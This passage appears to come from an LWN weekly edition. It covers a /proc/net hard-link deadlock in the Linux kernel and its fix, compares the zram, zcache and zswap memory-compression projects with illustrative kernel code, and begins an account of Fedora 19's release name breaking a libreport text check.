Some suggestions ensued regarding suitable debugging statements to add to the kernel's lock_rename() function to further investigate the problem. In particular, when two locks were held on the same inode address, Linus wanted to see the filenames corresponding to the inode and Al was interested to know the name of the filesystem holding the two inodes.

Further runs of Trinity with those debugging statements in place revealed that the locks in question were occurring for various entries under the /proc tree. At that point Linus refined the observation to note that the entries in question were for directories under /proc/net, but, like Al, he was puzzled as to how that could occur.

Here, a little background is probably in order. Once upon a time, /proc/net was a single directory. But, with the invention of network namespaces, it is now a symbolic link to the /proc/self/net directory; in other words, each process now has its own network-namespace-specific view of networking information under /proc.

With the output from the kernel debugging statements, the pieces started falling rapidly into place. Dave realized that he had started seeing the Trinity failure reports after he had enabled kernel namespaces support following a recent bug fix by Eric Biederman. Al began looking more closely at some of the subdirectories under the /proc/PID/net directories, and made an unhappy discovery:

    al <at> duke:~/linux/trees/vfs$ ls -lid /proc/{1,2}/net/stat
    4026531842 dr-xr-xr-x 2 root root 0 Mar 21 19:33 /proc/1/net/stat
    4026531842 dr-xr-xr-x 2 root root 0 Mar 21 19:33 /proc/2/net/stat

That discovery prompted a small explosion:

WE CAN NOT HAVE SEVERAL DENTRIES OVER THE SAME DIRECTORY INODE. […] Sigh... Namespace kinds - there should've been only one...

Those with a long memory, or at least careful attention when reading a recent LWN article, might smile with the realization that, to begin with and for many years thereafter, there was only one class of namespace—mount namespaces, as implemented by one Al Viro.

Humor aside, Al had discovered the origin of the problem. The directory listing above shows two directory entries linked to the same inode. More generally, for all of the processes that share a network namespace, each of the corresponding entries in /proc/PID/net is implemented as a hard link to the same (virtual) /proc file.

Implementing corresponding /proc entries as hard links to the same inode is a technique used in various places in the implementation of namespaces. Indeed, allowing multiple hard links to a file is a normal feature of UNIX-type systems. Except in one case: Linux, like other UNIX systems, forbids multiple hard links to a directory. The reliability of various pieces of kernel and user-space code is predicated on that assumption. However, a Linux 2.6.25 patch made early in the implementation of network namespaces set in train some changes that quietly broke the assumption for the directories under /proc/PID/net.

Having determined the cause of the problem, the developers then needed to devise a suitable fix. At this point, pragmatic factors come into play, since the task is not only to fix the kernel going forward, but also going backward. In other words, the ideal solution would be one that could be applied not only to the current kernel source tree but also to the stable and long-term kernel series. That led Linus to speculate about the possibility of allowing an exception to the rule that directory inodes are not allowed to have multiple links. Since the locks in question are placed at the inode level, why not change lock_rename() so that, instead of checking whether it is dealing with the same dentries, it checks whether it is dealing with the same inodes?
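
In rough terms, the change Linus was contemplating would have turned the dentry comparison at the top of lock_rename() into an inode comparison, along these lines (an illustrative sketch of the idea, not an actual patch):

    /* Sketch only: lock_rename() takes the parent dentries of the two
     * rename operands.  The existing code treats only "same dentry" as
     * the aliasing case ... */
    if (p1 == p2) {
        mutex_lock_nested(&p1->d_inode->i_mutex, I_MUTEX_PARENT);
        return NULL;
    }

    /* ... whereas the suggested check would also treat two different
     * dentries over the same directory inode as a single-lock case. */
    if (p1->d_inode == p2->d_inode) {
        mutex_lock_nested(&p1->d_inode->i_mutex, I_MUTEX_PARENT);
        return NULL;
    }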

However, Al was quick to point out that while modifying the check would solve the particular deadlock problem found by Dave, other problems would remain. The kernel code that deals with those locks depends upon a topological sort based on the hierarchical relationship between entries in the dcache; the presence of multiple directory entries that link to the same inode renders that sort unreliable.

Al went on to describe what he considered to be the full and proper solution: creating /proc/PID/net files as symbolic links to per-network-namespace directories of the form /proc/netns-ID/net, where netns-ID is a per-namespace identifier. Alternatively, the existing /proc/PID/net trees could be kept, but the subdirectories could be created as duplicate subtrees rather than hard links to a single directory subtree. Al was, however, unsure about the feasibility of implementing this solution as a patch that could be backported to past stable kernel series.

In the meantime, Linus came up with another proposal. proc_get_inode(), the kernel function for allocating inodes in the /proc filesystem, has the following form:

    struct inode *proc_get_inode(struct super_block *sb, struct proc_dir_entry *de)
    {
        struct inode *inode = iget_locked(sb, de->low_ino);

        if (inode && (inode->i_state & I_NEW)) {

            ...
            /* Populate fields in newly allocated cache entry pointed
               to by 'inode' */
            ...

            unlock_new_inode(inode);
        } else
            pde_put(de);
        return inode;
    }

The iget_locked() function searches the kernel's inode cache for an inode whose number corresponds to that recorded in the proc_dir_entry structure de. It returns either a pointer to an existing entry or, if no entry could be found, a newly allocated, uninitialized cache entry. The proc_get_inode() function then populates the fields of the newly allocated inode cache entry using information from the proc_dir_entry.

The deadlock problem is a result of the fact that—because multiple dentries map to the same inode—multiple locks may be placed on the same entry in the inode cache. Conversely, deadlocks could be avoided if it were possible to avoid placing multiple locks on the inode entries returned from the cache. As Linus noted, in the case of /proc files, it is not really necessary to find an existing entry in the cache, because there is no on-disk representation for the inodes under /proc. Instead, proc_get_inode() could simply always create a new cache entry via a call to new_inode_pseudo() and populate that cache entry. Since a new cache entry is always created, it will not be visible to any other process, so that there will be no possibility of lock conflicts and deadlocks. In other words, the logic of proc_get_inode() can be modified to be:

    struct inode *proc_get_inode(struct super_block *sb, struct proc_dir_entry *de)
    {
        struct inode *inode = new_inode_pseudo(sb);

        if (inode) {
            inode->i_ino = de->low_ino;

            ...
            /* Populate fields in newly allocated cache entry pointed
               to by 'inode' */
            ...

        } else
            pde_put(de);
        return inode;
    }

Here, it is worth noting that the kernel uses two different allocation schemes for the inodes under /proc: one scheme that is generally employed for inodes under the /proc/PID directories and another for the inodes in the remainder of /proc. Linus's patch affects only inode allocations for entries in the second category. However, as a consequence of the implementation history, whereby /proc/net was migrated to /proc/PID/net, the inodes under /proc/PID/net are allocated in the same fashion as inodes outside /proc/PID, and so the patch also affects those inodes.

In the subsequent commit message, Linus noted that the patch could have been refined so that the new behavior was applied only to directory entries, rather than all entries, under /proc. However, in the interests of keeping the change simple, no such differentiation was made.

The effect of Linus's patch is to prevent multiple locks (and thus deadlocks) on the same inode. Al agreed that the change should not be a problem from a correctness perspective. On the other hand, this change also has the effect of nullifying the benefits of inode caching for /proc files outside /proc/PID. Al wondered about the performance impact of that change. However, some casual instrumentation of the kernel suggested that the benefits of inode caching for /proc are low in any case. In addition, Dave reported that with the fix applied, Trinity was no longer hitting the deadlock problem.

Comments (none posted)

In-kernel memory compression

April 3, 2013

This article was contributed by Dan Magenheimer

Amdahl's law tells us that there is always a bottleneck in any computing system. Historically, the bottleneck in many workloads on many systems has been the CPU, so system designers have made CPUs faster and more efficient, and continue to increase the number of CPU cores even in low-end systems. So now, increasingly, RAM is the bottleneck; CPUs wait idly while data is moved from disk to RAM and back again. Adding more RAM is not always a timely or cost-effective option and sometimes not an option at all. Faster I/O buses and solid-state disks reduce the bottleneck but don't eliminate it.

Wouldn't it be nice if it were possible to increase the effective amount of data stored in RAM? And, since those CPUs are waiting anyway, perhaps we could use those spare CPU cycles to contribute towards that objective? This is the goal of in-kernel compression: We keep more data — compressed — in RAM and use otherwise idle CPU cycles to execute compression and decompression algorithms.

With the recent posting of zswap, there are now three in-kernel compression solutions proposed for merging into the kernel memory management (MM) subsystem: zram, zcache, and zswap. While a casual observer might think that only one is necessary, the three have significant differences and may target different user bases. So, just as there are many filesystems today co-existing in the kernel, someday there may be multiple compression solutions. Or maybe not... this will be decided by Linus and key kernel developers. To help inform that decision, this article compares and contrasts the different solutions, which we will call, for brevity, the "zprojects". We will first introduce some of the key concepts and challenges of compression. Then we will identify three design layers and elaborate on the different design choices made by the zprojects. Finally, we will discuss how the zprojects may interact with the rest of the kernel and then conclude.

Compression basics

For in-kernel compression to work, the kernel must take byte sequences in memory and compress them, and then keep the compressed version in RAM until some point in the future when the data is needed again. While the data is in a compressed state, it is impossible to read any individual bytes from it or write any individual bytes to it. Then, when the data is needed again, the compressed sequence must be decompressed so that individual bytes can again be directly accessed.

It is possible to compress any number of sequential bytes but it is convenient to use a fixed "unit" of compression. A standard storage unit used throughout the kernel is a "page", which consists of a fixed number of bytes, PAGE_SIZE (4KB on most architectures supported by Linux). If this page is aligned at a PAGE_SIZE address boundary, it is called a "page frame"; the kernel maintains a corresponding "struct page" for every page frame in system RAM. All three zprojects use a page as the unit of compression and allocate and manage page frames to store compressed pages.

There are many possible compression algorithms. In general, achieving a higher "compression ratio" takes a larger number of CPU cycles, whereas less-effective compression can be done faster. It is important to achieve a good balance between time and compression ratio. All three zprojects, by default, use the LZO(1X) algorithm in the kernel's lib/ directory, which is known to deliver a good balance. However, it is important that the choice of algorithm remain flexible; the in-CPU algorithm might, in some cases, be replaced by an architecture-specific hardware compression engine.

In general, the number of cycles required to compress, and to later decompress, a sequence of bytes is roughly proportional to the number of bytes in the sequence. Since the size of a page is fairly large, page compression and decompression are expensive operations and, so, we wish to limit the number of those operations. Thus we must carefully select which pages to compress, choosing pages that are likely to be used again but not likely to be used in the near future, lest we spend all the CPU's time repeatedly compressing and then decompressing pages. Since individual bytes in a compressed page are inaccessible, we must not only ensure that normal CPU linear byte addressing is not attempted on any individual byte, but also ensure that the kernel can clearly identify the compressed page so that it can be found and decompressed when the time comes to do so.

When a page is compressed, the compression algorithm is applied and the result is a sequence of bytes which we can refer to as a "zpage". The size of a zpage, its "zsize", is highly data-dependent, hard to predict, and highly variable. Indeed the expected distribution of zsize drives a number of key zproject design decisions so it is worthwhile to understand it further. The "compression ratio" for a page is zsize divided by PAGE_SIZE. For nearly all pages, zsize is less than PAGE_SIZE so the compression ratio is less than one, but odd cases may occur where compression actually results in the zsize being larger than PAGE_SIZE. A good compression solution must have a contingency plan to deal with such outliers. At the other extreme, a data page containing mostly zeroes or ones may compress by a factor of 100x or more. For example, LZO applied to an all-zero page results in a zpage with zsize equal to 28, for a compression ratio of 0.0068.

As a rough rule of thumb, "on average", compression has a ratio of about 0.5 (i.e. it reduces a page of data by about a factor of two), so across a wide set of workloads, it is useful to envision the distribution as a bell curve, centered at PAGE_SIZE/2. We will refer to zpages with zsize less than PAGE_SIZE/2 as "thin" zpages, and zpages with zsize greater than PAGE_SIZE/2 as "fat" zpages. For any given workload, of course, the distribution may "skew thin" (if many mostly-zero pages are compressed, for example) or "skew fat", as is true if the data is difficult to compress (already-compressed data like a JPEG image would be an example). A good compression solution must thus be able to handle zsize distributions from a wide range of workloads.
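
In code, the compression step itself is simple. A rough sketch using the kernel's LZO routines follows; real zprojects add per-CPU work buffers, fuller error handling, and interaction with a zpage allocator, so this is illustrative only:

    /* Sketch: compress one page with the kernel's LZO1X code and classify
     * the result as a "thin" or "fat" zpage in the sense used above.
     * 'dst' must hold at least lzo1x_worst_compress(PAGE_SIZE) bytes and
     * 'wrkmem' at least LZO1X_MEM_COMPRESS bytes. */
    static int compress_one_page(const void *page_addr, unsigned char *dst,
                                 void *wrkmem, size_t *zsize)
    {
        int ret = lzo1x_1_compress(page_addr, PAGE_SIZE, dst, zsize, wrkmem);

        if (ret != LZO_E_OK)
            return -EINVAL;
        if (*zsize >= PAGE_SIZE)
            return -E2BIG;      /* incompressible outlier */

        pr_debug("zpage is %s (zsize=%zu)\n",
                 *zsize < PAGE_SIZE / 2 ? "thin" : "fat", *zsize);
        return 0;
    }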

With this overview and terminology, we can now compare and contrast the three zprojects. At a high level, each uses a "data source layer" to provide pages to compress and a "data management layer" to organize and store the zpages. This data management layer has two sublayers, the first for data organization, which we will call the "metadata layer", and the second for determining how best to utilize existing kernel memory and kernel allocation code (such as alloc_page()) to optimally store the zpages, which we will call the "zpage allocator layer".

Data source layer — overview

As previously noted, the nature of compression limits the types and quantities of pages to which it can be applied. It doesn't make sense to compress a page for which there is a high probability of imminent reuse. Nor does it make sense to compress a page for which there is a high probability the data it contains will never be used again. All three zprojects assume one or more data sources that provide a "pre-qualified" sequence of data pages. In one zproject, an existing kernel subsystem is the data source. For the other two zprojects, the data page stream is sourced by kernel hooks, known as cleancache and frontswap, that were added earlier as part of the "transcendent memory" project.

Each data source must also provide a unique identifier, or "key", for each page of data so that the page, once stored and associated with that unique key, can be later retrieved by providing the key. It's also important to note that different data sources may result in streams of pages with dramatically different contents and thus, when compressed, different zsize distributions.

Swap/anonymous pages as a data source

The Linux swap subsystem provides a good opportunity for compression because, when the system is under memory pressure, swap acts as a gatekeeper between (a) frequently used anonymous pages which are kept in RAM, and (b) presumably less frequently used anonymous pages that "overflow", or can be "swapped", to a very-much-slower-than-RAM swap disk. If, instead of using a slow swap disk, we can cause the gatekeeper to store the overflow pages in RAM, compressed, we may be able to avoid swapping them entirely. Further, the swap subsystem already provides a unique key for each page so that the page can be fetched from the swap disk. So, unsurprisingly, all three zprojects consider swap pages as an ideal data source for compression.

One zproject, zram, utilizes the existing swap device model. A zram swap device is explicitly created and enabled in user space (via mkswap and swapon) and this zram device is prioritized (presumably highest) against other configured swap devices. When the swap subsystem sends a data page to the zram device, the page goes through the block I/O subsystem to the zram "driver". All swap pages sent to zram are compressed and associated with a key created by concatenating the swap device identifier and page offset. Later, when the swap subsystem determines (via a page fault) that the page must be brought back in from the swap device to fill a specific page frame, the zram device is notified; it then decompresses the zpage matching the swap device number and page offset into that page frame.

The other two zprojects, zcache and zswap, use the kernel's frontswap hooks (available since Linux 3.5) in the swap subsystem. Frontswap acts as a "fronting store" — a type of cache — to an existing swap device. It avoids the block I/O subsystem completely; swapped pages instead go directly to zcache/zswap where they are compressed. On the fetch path, when the page fault occurs, the block I/O subsystem is again bypassed and then, as with zram, the page is decompressed directly into the faulting page frame.
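
The store side of that path can be sketched roughly as follows. The callback signature follows the general shape of the 3.x frontswap interface, and compress_and_stash() is a hypothetical stand-in for the compression and zpage-allocation steps described later in this article:

    /* Sketch of a frontswap-based store operation.  A nonzero return
     * value rejects the page, and the swap subsystem then writes the
     * uncompressed page to the real swap device as usual. */
    static int zfront_store(unsigned type, pgoff_t offset, struct page *page)
    {
        void *src = kmap_atomic(page);
        size_t zsize;
        int ret;

        /* compress_and_stash() is hypothetical: compress the page and,
         * if it fits, record (type, offset) -> zpage in the metadata. */
        ret = compress_and_stash(type, offset, src, &zsize);
        kunmap_atomic(src);

        return ret;     /* 0 on success; nonzero falls back to disk */
    }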

There are some subtle but important side effects of the different approaches:

  • The block I/O subsystem is designed to work with fixed-size block devices and is not very happy when a block write results in a failure. As a result, when a poorly-compressible page ("very fat" zpage) is presented to zram, all PAGE_SIZE bytes of the uncompressed page are stored by zram in RAM, for no net space savings. The frontswap-based zprojects have more flexibility; if a very fat zpage is presented, zcache/zswap can simply reject the request, in which case the swap subsystem will pass on the original data page to the real swap disk.

  • Since zram presents itself as a swap disk, user-space configuration is required, but this also means that zram can work on systems with no physical swap device, a configuration common for embedded Linux systems. On the other hand, zcache and zswap depend entirely on already-configured swap devices and so are not functional unless at least one physical swap device is configured and sized adequately. As a result, one might think of zram as being a good match for an embedded environment, while the others are better suited for a more traditional server/data-center environment.

  • It is important to note that all three zprojects must never discard any of these data pages unless explicitly instructed; otherwise, user-space programs may experience data loss. Since all three zprojects have a finite capacity on any given system, it is prudent to have a "pressure relief valve". Both zcache and zswap have the ability to "write back" data to the swap disk to which the data was originally intended to be written; this cannot be done with zram.

Clean page cache pages as a data source

It is not uncommon for the vast majority of page frames in a running system to contain data pages that are identical to pages already existing on a disk in a filesystem. In Linux, these pages are stored in the page cache; the data in these pages is kept in RAM in anticipation that it will be used again in the future. When memory pressure occurs and the kernel is looking to free RAM, the kernel will be quick to discard some of this duplicate "clean" data because it can be fetched from the filesystem later if needed. A "cleancache" hook, present in the kernel since Linux 3.0, can divert the data in these page frames, sending the pages to zcache where the data can be compressed and preserved in RAM. Then, if the kernel determines the data is again needed in RAM, a page fault will be intercepted by another cleancache hook which results in the decompression of the data.

Because modern filesystems can be large, unique identification of a page cache page is more problematic than is unique identification of swap pages. Indeed, the key provided via cleancache must uniquely identify: a filesystem; an "exportable" inode value representing a file within that filesystem; and a page offset within the file. This combination requires up to 240 bits.

Zcache was designed to handle cleancache pages, including the full range of required keys. As a result, the data management layer is much more complex, consisting of a combination of different data structures, which we will describe below. Further, the location of some cleancache hooks in the VFS part of the kernel results in some calls to the data management layer with interrupts disabled, which must be properly handled.

Even more than with swap data, filesystem data can proliferate rapidly and, even compressed, can quickly fill up RAM. So, as with swap data, it is prudent to have a pressure-relief valve for page cache data. Unlike swap data, however, we know that page cache data can simply be dropped whenever necessary. Since zcache was designed from the beginning to manage page cache pages, its data management layer was also designed to efficiently handle the eviction of page cache zpages.

Zram can maintain entire fixed-size filesystems in compressed form in RAM, but not as a cache for a non-RAM-based filesystem. In essence, part of RAM can be pre-allocated as a "fast disk" for a filesystem; even filesystem metadata is compressed and stored in zram. While zram may be useful for small filesystems that can entirely fit in RAM, the caching capability provided via cleancache combined with the compression provided by zcache is useful even for large filesystems.

Zswap is singularly focused on swap, and so does not use the page cache or filesystem data as a data source at all. As a result, its design is simpler because it can ignore the complexities required to handle the tougher page cache data source.

The metadata layer

Once the zproject receives a data page for compression, it must set up and maintain data structures so that the zpage can be stored and associated with a key for that page, and then later found and decompressed. Concurrency must also be considered to ensure that unnecessary serialization bottlenecks do not occur. The three zprojects use very different data structures for different reasons, in part driven by the requirements of data sources to be maintained.

Since the number of swap devices in a system is small, and the number of pages in each is predetermined and fixed, a small, unsigned integer representing the swap device combined with a page offset is sufficient to identify a specific page. So zram simply uses a direct table lookup (one table per configured zram swap device) to find and manage its data. For example, for each data page stored, the zram table contains a zsize, since zsize is useful for decompression validation, as well as information to get to the stored data. Concurrency is restricted, per-device, by a reader-writer semaphore.

Zswap must manage the same swap-driven address space, but it utilizes one dynamic red-black tree (rbtree) per swap device to manage its data. During tree access, a spinlock on the tree must be held; this is not a bottleneck because simultaneous access within any one swap device is greatly limited by other swap subsystem factors. Zswap's metadata layer is intentionally minimalist.
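
A simplified sketch of that kind of per-device lookup, keyed by page offset, appears below; the structure and field names are illustrative rather than zswap's actual ones:

    /* Illustrative metadata entry: one per stored zpage, keyed by the
     * page's offset within its swap device. */
    struct zentry {
        struct rb_node rbnode;
        pgoff_t offset;         /* key */
        unsigned int zsize;     /* compressed length */
        void *zhandle;          /* opaque handle from the zpage allocator */
    };

    static struct zentry *zentry_find(struct rb_root *root, pgoff_t offset)
    {
        struct rb_node *node = root->rb_node;

        while (node) {
            struct zentry *e = rb_entry(node, struct zentry, rbnode);

            if (offset < e->offset)
                node = node->rb_left;
            else if (offset > e->offset)
                node = node->rb_right;
            else
                return e;
        }
        return NULL;            /* not stored; fetch from the swap device */
    }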

Zcache must manage both swap data and pagecache data, and the latter has a much more extensive key space which drives the size and complexity of zcache data structures. For each filesystem, zcache creates a "pool" with a hash table of red-black tree root pointers; each node in the rbtree represents a filesystem inode — the inode space in an exportable filesystem is often very sparsely populated which lends itself to management by an rbtree. Then each rbtree node contains the head of a radix tree — the data structure used throughout the kernel for page offsets — and this radix tree is used to look up a specific page offset. The leaf of the radix tree points to a descriptor which, among other things, references the zpage. Each hash table entry has a spinlock to manage concurrency; unlike swap and frontswap, filesystem accesses via cleancache may be highly concurrent so contention must be aggressively avoided.

Impact of writeback on the metadata layer

Earlier it was noted that zcache and zswap support "writeback"; this adds an important twist to the data structures in that, ideally, we'd like to write back pages in some reasonable order, such as least recently used (LRU). To that end, both zcache and zswap maintain a queue to order the stored data; zswap queues each individual zpage and zcache queues the page frames used to store the zpages. While lookup requires a key and searches the data structures from the root downward, writeback chooses one or more zpages from the leaves of the data structure and then must not only remove or decompress the data, but must also remove its metadata from the leaf upward. This requirement has two ramifications: First, the leaf nodes of data structures must retain the key along with information necessary to remove the metadata. Second, if writeback is allowed to execute concurrently with other data structure accesses (lookup/insert/remove), challenging new race conditions arise which must be understood and avoided.

Zswap currently implements writeback only as a side effect of storing data (when kernel page allocation fails) which limits the possible race conditions. Zcache implements writeback as a shrinker routine that can be run completely independently and, thus, must handle a broader set of potential race conditions. Zcache must also handle this same broader set when discarding page cache pages.

Other metadata layer topics

One clever data management technique is worth mentioning here: Zram deduplicates "zero pages" — pages that contain only zero bytes — requiring no additional storage. In some zsize distributions, such pages may represent a significant portion of the zpages to be stored. While the data of the entire page may need to be scanned to determine if it is a zero page, this overhead may be small relative to that of compression and, in any case, it pre-populates the cache with bytes that the compression algorithm would need anyway. Zcache and zswap should add this feature. More sophisticated deduplication might also be useful. Patches are welcome.
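
The test itself is inexpensive to express; a sketch of the kind of scan zram performs (not its exact code) looks like this:

    /* Sketch: return true if the page contains only zero bytes.  zram
     * runs a test of this kind before compressing, so zero pages can be
     * recorded in the metadata with no backing storage at all. */
    static bool page_is_zero_filled(const void *addr)
    {
        const unsigned long *p = addr;
        unsigned int i;

        for (i = 0; i < PAGE_SIZE / sizeof(*p); i++)
            if (p[i])
                return false;
        return true;
    }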

Zpage allocator layer

Memory allocation for zpages can present some unique challenges. First, we wish to maximize the number of zpages stored in a given number of kernel page frames, a ratio which we will call "density". Maximizing the density can be challenging as we do not know a priori the number of zpages to be stored, the distribution of zsize of those zpages, or the access patterns which insert and remove those zpages. As a result, fragmentation can be a concern. Second, allocating memory to store zpages may often occur in an environment of high-to-severe memory pressure; an effective allocator must handle frequent failure and should minimize large (i.e. multiple-contiguous-page) allocations. Third, if possible, we wish the allocator to support some mechanism to enable ordered writeback and/or eviction as described above.

One obvious alternative is to use an allocator already present and widely used in the kernel: kmalloc(), which is optimized for allocations that nicely fit into default sizes of 2^N-byte chunks. For allocations of size 2^N+x, however, as much as 50% of the allocated memory is wasted. kmalloc() provides an option for "odd" sizes but this requires pre-allocated caches, often of contiguous sets of pages ("higher order" pages) which are difficult to obtain under memory pressure. Early studies showed that kmalloc() allocation failures were unacceptably frequent and density was insufficient, so kmalloc() was discarded and other options were pursued, all based on alloc_page(), which always allocates a single page frame.
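
To make the rounding overhead concrete, consider a hypothetical allocation for a fat zpage on a kernel with the usual power-of-two kmalloc() size classes:

    /* Hypothetical example: a 2100-byte zpage requested via kmalloc()
     * is served from the 4096-byte size class, so nearly half of the
     * allocated memory is unused. */
    void *zpage = kmalloc(2100, GFP_KERNEL);    /* consumes a 4096-byte object */

    /* ... store the compressed data ... */

    kfree(zpage);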

To improve density, the xvmalloc allocator was written, based on the two-level sequential fit (TLSF) algorithm. Xvmalloc provided high density for some workloads and was the initial default allocator for zram and for the frontswap-driven portion of the initial zcache. It was found, however, that the high density led to poor fragmentation characteristics, especially for zsize distributions that skewed fat. Xvmalloc has since been discarded (though remnants of it survive through Linux 3.8).

A new allocator, zbud, was written for the cleancache-driven portion of the original zcache code. The initial version of zbud had less focus on high density and more on the ability to efficiently evict cleancache-provided zpages. With zbud, no more than two zpages are contained in a page frame, buddying up a pair of zpages, one fat and one thin. Page frames, rather than zpages, are entered into an LRU queue so that entire page frames can be easily "freed" to the system. On workloads where zsize skews thin, a significant amount of space is wasted, but fragmentation is limited, and eviction is still easy.

Zsmalloc, an allocator intended to "rule them all", was then written. Zsmalloc takes the best of kmalloc() but with the ability to provide the complete range of "size classes" suitable to store zpages; zsmalloc also never requires higher-order allocations. All zpages with zsize within a "class" (e.g. between 33-48 bytes) are grouped together and stored in the same "zspage". A clever feature (especially useful for fat zpages) allows discontiguous page frames to be "stitched" together, so that the last bytes in the first page frame contain the first part of the zpage and the first bytes of the second page frame contain the second part. A group of N of these discontiguous pages are allocated on demand for each size class, with N chosen by the zsmalloc code to optimize density.

As a result of these innovations, zsmalloc achieves great density across a wide range of zsize distributions: balanced, fat, and thin. Alas, zsmalloc's strengths also prove to be its Achilles heel: high density and page crossings make it very difficult for eviction and writeback to concurrently free page frames, resulting in a different kind of fragmentation (and consequent lower density) and rendering it unsuitable for management of cleancache-provided pages in zcache. So zbud was revised to utilize some of the techniques pioneered by zsmalloc. Zbud is still limited to two zpages per page frame, but when under heavy eviction or writeback, its density compares favorably with zsmalloc. The decision by zcache to use zbud for swap pages sadly led to a fork of zcache, first to "old zcache" (aka zcache1) and "new zcache" (aka zcache2) and then to a separate zproject entirely, zswap, because zswap's author prefers the density of zsmalloc over the ability to support cleancache pages and the predictability and page-frame reclaim of zbud.

So, today, there are two zpage allocators, both still evolving. The choice of the best zpage allocator depends on usage models and unpredictable workloads. Some hybrid of the two may yet emerge, or perhaps some as-yet-unwritten allocator will arise to "rule them all".

Memory management subsystem interaction

In some ways, a zproject is like a cache for pages temporarily removed from the MM subsystem. However, it is a rather unusual cache in that, to store its data, it steals capacity (page frames) from its backing store, the MM subsystem. From the point of view of the MM subsystem, the RAM is just gone, just as if the page frames had been absorbed by a RAM-voracious device driver. This is a bit unfortunate, given that both the zproject and the MM subsystem are respectively, but separately, managing compressed and uncompressed anonymous pages (and possibly compressed and uncompressed page cache pages as well). So it is educational to consider how a zproject may "load balance" its memory needs with the MM subsystem, and with the rest of the kernel.

Currently, all three zprojects obtain page frames using the standard kernel alloc_page() call, with the "GFP flags" parameter chosen to ensure that the kernel's emergency reserve pages are never used. So each zproject must be (and is) resilient to the fairly frequent situation where an alloc_page() call returns failure.
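
In code, that allocation looks something like the following; the exact flag combination differs between the zprojects, so this is only illustrative:

    /* Illustrative: allocate a page frame for zpage storage without
     * touching the emergency reserves and without retrying hard, so
     * failure is common and must be tolerated by the caller. */
    struct page *pframe = alloc_page(__GFP_NORETRY | __GFP_NOWARN |
                                     __GFP_NOMEMALLOC);
    if (!pframe)
        return -ENOMEM;         /* reject the store; data goes to disk instead */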

Zram makes no other attempt to limit its total use of page frames but, as we've seen, it is configured by the administrator as a swap device, and swap parameters do limit the number of swap pages, and thus zpages, that can be accepted. This indirectly but unpredictably limits the number of page frames used. Also, the configuration is independent of and not cognizant of the total RAM installed in the system, so configuration errors are very possible.

Zswap uses a slightly modified version of zsmalloc to track the total number of page frames allocated. It ensures this number does not exceed a certain percent of total RAM in the system, and this limit is configurable via sysfs. As previously noted, using writeback, zswap can reduce the number of (anonymous) zpages stored and this, indirectly, can reduce the number of page frames, though at the likely cost of fragmentation.

Zcache and zbud were designed from the beginning with much more dynamic constraints on page frame utilization in mind, intended eventually to flexibly mesh with the dramatically time-varying memory balancing algorithms that the MM subsystem uses. While the exact interaction model and best future control policy are not yet determined, zcache's and zbud's underlying page frame-based writeback and eviction mechanisms support a shrinker-like interface that can be told to, for example, reduce the number of page frames used for storing anonymous zpages from 10000 to 8937 and the number of page frames used for storing page cache zpages from 3300 to 463, and zcache can do that. Since zbud is much more predictable (two zpages per page frame), the MM subsystem can estimate and manage both the total number of anonymous and pagecache pages (compressed and uncompressed) in the system and the total number of page frames used to manage them.

Status and conclusions

Zram, zcache, and zswap are all advancing the concept of in-kernel compression in different ways. Zram and zcache are in-tree but both still in the staging tree. While the staging tree has served to expose the concept of in-kernel compression to a wide group of kernel developers and even to the users of a few leading-edge distributions, as Andrew Morton says, the staging tree "is where code goes to be ignored." Staging tree maintainer Greg Kroah-Hartman has become reluctant to accept any new zproject functionality into the staging tree. This creates a conundrum for these zprojects: evolution in the staging tree has resulted in rapid improvements in the design and implementation and exposure of the zprojects, but because of this evolution they are not stable enough for promotion into the core kernel and further evolution is now stymied.

Zswap is attempting to circumvent the staging tree entirely by proposing what is essentially a simplified frontswap-only fork of zcache using zsmalloc instead of zbud, for direct merging into the MM subsystem. Since it is also much simpler than zcache, it has garnered more reviewers, which is a valuable advantage for to-be-merged code. But it is entirely dependent on the still-in-staging zsmalloc, does not support page cache pages at all, and does not support page-frame-based writeback, so its simplicity comes at a cost. If zswap is merged, it remains to be seen whether it will ever be extended adequately.

So, in-kernel compression has clear advantages and real users. It remains unclear though when (or if) it will be merged into the core kernel and how it should interact with the core kernel. If you are intrigued, the various zproject developers encourage your ideas and contributions.

Acknowledgments

Nitin Gupta was the original author of compcache and I was the original author of transcendent memory. While both projects were initially targeted to improve memory utilization in a multi-tenant virtualized environment, their application to compression in a single kernel quickly became apparent. Nitin designed and wrote the Linux code for zram, xvmalloc, and zsmalloc, and wrote an early prototype implementation of zcache. I wrote frontswap and cleancache (with the cleancache hook placement originally done by Chris Mason), and the Linux code for zcache, zbud, and ramster. Seth Jennings contributed a number of improvements to zcache and is the author of zswap. Kernel mm developer Minchan Kim was a helpful influence for all the zprojects, and none of the zprojects would have been possible without Greg Kroah-Hartman's support — and occasional whippings — as maintainer of the staging drivers tree.

As with any open-source project, many others have contributed ideas, bug fixes, and code improvements and we are thankful for everyone's efforts.

Comments (31 posted)

Patches and updates

Kernel trees

Core kernel code

Device drivers

Documentation

Filesystems and block I/O

Memory management

Networking

Security-related

Page editor: Jonathan Corbet

Distributions

Schrödinger's 😻 and outside-the-box naming

By Nathan Willis
April 3, 2013

What's in a string? That depends on who you ask, apparently; a lesson that Fedora recently learned when it unexpectedly ran into a problem with the release name for the upcoming Fedora 19, "Schrödinger's Cat"—and all of the unusual characters contained within. Typographic oddities might seem like a trivial reason to upend the distribution release process, but a validation tool in the bug reporting system objected to the name, so Fedora developers found themselves asking whether it was more practical to stop and fix all of the utilities, or to change the release name itself.

The problem, of course, is that unlike previous Fedora release names, "Schrödinger's Cat" contains some characters outside the basic Latin alphabet: an o with umlaut and an apostrophe. But the issue encountered in the wild is more specific still: the "apostrophe" in question is frequently typed as the similar-looking but distinct single-quote character, and quotes can wreak havoc when the release name is processed by a shell script. On March 16, Adam Williamson reported a bug in the Fedora bug reporting tool: when reporting a bug against Fedora 19, the server side threw an error when it tried to validate the name of the release, complaining of "illegal characters."

The root of the bug was quickly traced to libreport, which contains an is_text_file() function. The function decides whether a given file is text by counting the bytes with values greater than 0x80; if more than 2% of the bytes are in that range, the file is treated as binary. Two percent is a rather arbitrary limit, and in this case the file triggering the error was /etc/os-release, which consisted of a single line:

    Fedora release 19 (Schrödinger's Cat)

Dave Malcolm pointed out that the /etc/os-release manual page says non-alphanumeric characters should be escaped "with backslashes, following shell style," and Denys Vlasenko patched is_text_file() to bump the acceptable-character threshold from 2% to 10%. But that fix was a simple workaround; as others in the bug comments pointed out, the function should test whether the contents of the file are really valid UTF-8 text, which the 0x80 test does not do.
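
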